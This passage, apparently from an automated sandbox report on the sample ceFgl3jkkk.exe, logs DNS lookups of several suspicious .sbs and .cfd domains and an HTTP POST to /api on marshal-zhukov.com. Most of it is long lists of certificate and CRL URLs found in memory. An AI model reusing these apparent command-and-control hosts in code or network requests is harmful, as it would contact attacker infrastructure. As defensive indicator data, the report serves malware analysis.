        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: marshal-zhukov.com
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 identical entries in the report)
    Source: global traffic | DNS traffic detected: DNS query: droppyrelivei.cfd
    Source: global traffic | DNS traffic detected: DNS query: mathcucom.sbs
    Source: global traffic | DNS traffic detected: DNS query: allocatinow.sbs
    Source: global traffic | DNS traffic detected: DNS query: enlargkiw.sbs
    Source: global traffic | DNS traffic detected: DNS query: resinedyw.sbs
    Source: global traffic | DNS traffic detected: DNS query: vennurviot.sbs
    Source: global traffic | DNS traffic detected: DNS query: ehticsprocw.sbs
    Source: global traffic | DNS traffic detected: DNS query: condifendteu.sbs
    Source: global traffic | DNS traffic detected: DNS query: drawwyobstacw.sbs
    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: marshal-zhukov.com
    Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: marshal-zhukov.com
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assured
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digi
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digice
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, 
ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
